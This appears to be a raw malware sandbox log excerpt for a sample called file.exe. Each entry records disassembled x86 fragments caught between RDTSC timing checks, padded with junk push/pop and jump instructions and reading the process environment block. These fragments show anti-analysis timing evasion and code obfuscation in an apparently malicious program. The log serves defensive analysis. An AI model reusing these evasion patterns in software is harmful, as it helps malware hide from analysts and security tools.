Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E77AD second address: 19E77B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E77B3 second address: 19E77B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E78A0 second address: 19E78A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E78A4 second address: 19E78AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E937A second address: 19E9395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E9395 second address: 19E93AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FC69CFD56E6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E8F3D second address: 19E8F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69D5338FEh 0x00000009 jc 00007FC69D5338F6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E8F56 second address: 19E8F7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC69CFD56F0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19EAED9 second address: 19EAEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19EAEDD second address: 19EAEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540011 second address: 754007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC69D533907h 0x00000009 sbb esi, 30F8C6DEh 0x0000000f jmp 00007FC69D533909h 0x00000014 popfd 0x00000015 call 00007FC69D533900h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC69D533908h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754007D second address: 7540083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540083 second address: 75400B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 mov ebx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d jmp 00007FC69D533902h 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC69D5338FAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75400B2 second address: 75400C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75400C1 second address: 75400EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 80h 0x00000005 call 00007FC69D533900h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr fs:[00000030h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ecx, 66D3C079h 0x0000001c push eax 0x0000001d pop ebx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75400EB second address: 7540127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov ax, B9E9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d sub esp, 18h 0x00000010 jmp 00007FC69CFD56F4h 0x00000015 xchg eax, ebx 0x00000016 jmp 00007FC69CFD56F0h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540127 second address: 754012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754012B second address: 754012F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754012F second address: 7540135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540135 second address: 754017B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FC69CFD56F6h 0x0000000f mov ebx, dword ptr [eax+10h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC69CFD56F7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754017B second address: 7540181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540181 second address: 7540275 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FC69CFD56F6h 0x00000011 push eax 0x00000012 jmp 00007FC69CFD56EBh 0x00000017 xchg eax, esi 0x00000018 jmp 00007FC69CFD56F6h 0x0000001d mov esi, dword ptr [74E806ECh] 0x00000023 pushad 0x00000024 mov ebx, eax 0x00000026 jmp 00007FC69CFD56EAh 0x0000002b popad 0x0000002c test esi, esi 0x0000002e jmp 00007FC69CFD56F0h 0x00000033 jne 00007FC69CFD6630h 0x00000039 jmp 00007FC69CFD56F0h 0x0000003e xchg eax, edi 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007FC69CFD56EEh 0x00000046 add cx, F358h 0x0000004b jmp 00007FC69CFD56EBh 0x00000050 popfd 0x00000051 jmp 00007FC69CFD56F8h 0x00000056 popad 0x00000057 push eax 0x00000058 jmp 00007FC69CFD56EBh 0x0000005d xchg eax, edi 0x0000005e jmp 00007FC69CFD56F6h 0x00000063 call dword ptr [74E50B60h] 0x00000069 mov eax, 750BE5E0h 0x0000006e ret 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 mov esi, 06D223CFh 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540275 second address: 754027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754027B second address: 754027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754027F second address: 75402DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d pushad 0x0000000e mov dl, al 0x00000010 pushfd 0x00000011 jmp 00007FC69D533901h 0x00000016 add ax, FB16h 0x0000001b jmp 00007FC69D533901h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC69D5338FDh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75402DB second address: 75403A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC69CFD56EAh 0x00000009 add ax, AE68h 0x0000000e jmp 00007FC69CFD56EBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, edi 0x00000018 jmp 00007FC69CFD56F6h 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FC69CFD56F1h 0x00000025 and si, CF36h 0x0000002a jmp 00007FC69CFD56F1h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007FC69CFD56F0h 0x00000036 xor ah, 00000058h 0x00000039 jmp 00007FC69CFD56EBh 0x0000003e popfd 0x0000003f popad 0x00000040 xchg eax, edi 0x00000041 pushad 0x00000042 mov edx, eax 0x00000044 call 00007FC69CFD56F0h 0x00000049 call 00007FC69CFD56F2h 0x0000004e pop esi 0x0000004f pop edx 0x00000050 popad 0x00000051 push dword ptr [eax] 0x00000053 jmp 00007FC69CFD56EEh 0x00000058 mov eax, dword ptr fs:[00000030h] 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75403A5 second address: 75403C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75403C2 second address: 75403DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 05C56C89h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [eax+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC69CFD56EBh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75403FC second address: 7540400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540400 second address: 7540406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540406 second address: 754043E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ch 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, ecx 0x00000011 pushfd 0x00000012 jmp 00007FC69D533904h 0x00000017 adc cx, 1498h 0x0000001c jmp 00007FC69D5338FBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754043E second address: 7540444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540444 second address: 7540448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540448 second address: 754044C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754044C second address: 7540487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FC69D533907h 0x0000000f je 00007FC70ADF2B31h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC69D533900h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540487 second address: 754048B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754048B second address: 7540491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540491 second address: 75404A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub eax, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404A3 second address: 75404A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404A7 second address: 75404AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404AB second address: 75404B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404B1 second address: 75404C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404C9 second address: 75404CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404CD second address: 75404F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC69CFD56F9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404F4 second address: 75404FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404FA second address: 7540548 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007FC69CFD56F0h 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 pushad 0x00000015 call 00007FC69CFD56EEh 0x0000001a mov ax, 1631h 0x0000001e pop ecx 0x0000001f mov ebx, 57F5A8A2h 0x00000024 popad 0x00000025 mov dword ptr [esi+0Ch], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d mov esi, 61066787h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540548 second address: 754058E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007FC69D533904h 0x0000000c sub si, 5468h 0x00000011 jmp 00007FC69D5338FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+4Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC69D533900h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754058E second address: 7540592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540592 second address: 7540598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540598 second address: 75405B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, FCE3h 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+10h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC69CFD56EDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75405B9 second address: 75405BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75405BD second address: 75405C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75405C3 second address: 7540600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 9C79h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+50h] 0x0000000d pushad 0x0000000e pushad 0x0000000f mov di, A622h 0x00000013 call 00007FC69D533903h 0x00000018 pop esi 0x00000019 popad 0x0000001a movsx edi, cx 0x0000001d popad 0x0000001e mov dword ptr [esi+14h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC69D5338FAh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540600 second address: 7540606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540606 second address: 754060C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754060C second address: 7540610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540610 second address: 75406C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC69D533902h 0x00000012 and eax, 330E5048h 0x00000018 jmp 00007FC69D5338FBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FC69D533908h 0x00000024 xor ax, 92A8h 0x00000029 jmp 00007FC69D5338FBh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [esi+18h], eax 0x00000033 jmp 00007FC69D533906h 0x00000038 mov eax, dword ptr [ebx+58h] 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 pushfd 0x00000041 jmp 00007FC69D533903h 0x00000046 or si, 654Eh 0x0000004b jmp 00007FC69D533909h 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75406C1 second address: 754072B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f pushad 0x00000010 call 00007FC69CFD56F6h 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FC69CFD56EBh 0x0000001c or ecx, 1C7E98BEh 0x00000022 jmp 00007FC69CFD56F9h 0x00000027 popfd 0x00000028 popad 0x00000029 popad 0x0000002a mov eax, dword ptr [ebx+5Ch] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754072B second address: 754072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754072F second address: 7540733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540733 second address: 7540739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540739 second address: 754076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c pushad 0x0000000d mov dh, ah 0x0000000f mov di, 337Eh 0x00000013 popad 0x00000014 mov eax, dword ptr [ebx+60h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC69CFD56F0h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754076F second address: 754077F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+24h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov eax, edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754077F second address: 75407BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+64h] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC69CFD56F4h 0x00000011 adc al, FFFFFFD8h 0x00000014 jmp 00007FC69CFD56EBh 0x00000019 popfd 0x0000001a mov eax, 68BEF38Fh 0x0000001f popad 0x00000020 mov dword ptr [esi+28h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75407BD second address: 75407C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75407C1 second address: 75407D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75407D8 second address: 7540802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC69D5338FFh 0x00000008 pop ecx 0x00000009 movsx ebx, cx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [ebx+68h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC69D5338FAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540802 second address: 7540811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540811 second address: 7540817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540817 second address: 754081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754081B second address: 7540832 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC69D5338FAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540832 second address: 7540844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540844 second address: 7540870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+6Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC69D533905h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540870 second address: 7540876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540876 second address: 7540919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+30h], ax 0x0000000c pushad 0x0000000d call 00007FC69D533905h 0x00000012 mov ecx, 6C319BD7h 0x00000017 pop esi 0x00000018 call 00007FC69D5338FDh 0x0000001d mov ebx, eax 0x0000001f pop eax 0x00000020 popad 0x00000021 mov ax, word ptr [ebx+00000088h] 0x00000028 jmp 00007FC69D533903h 0x0000002d mov word ptr [esi+32h], ax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FC69D533904h 0x00000038 and ecx, 15101BD8h 0x0000003e jmp 00007FC69D5338FBh 0x00000043 popfd 0x00000044 pushad 0x00000045 mov edx, esi 0x00000047 call 00007FC69D533902h 0x0000004c pop ecx 0x0000004d popad 0x0000004e popad 0x0000004f mov eax, dword ptr [ebx+0000008Ch] 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540919 second address: 754091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754091D second address: 7540921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540921 second address: 7540927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540927 second address: 7540980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533905h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c jmp 00007FC69D5338FEh 0x00000011 mov eax, dword ptr [ebx+18h] 0x00000014 jmp 00007FC69D533900h 0x00000019 mov dword ptr [esi+38h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC69D533907h 0x00000023 rdtsc
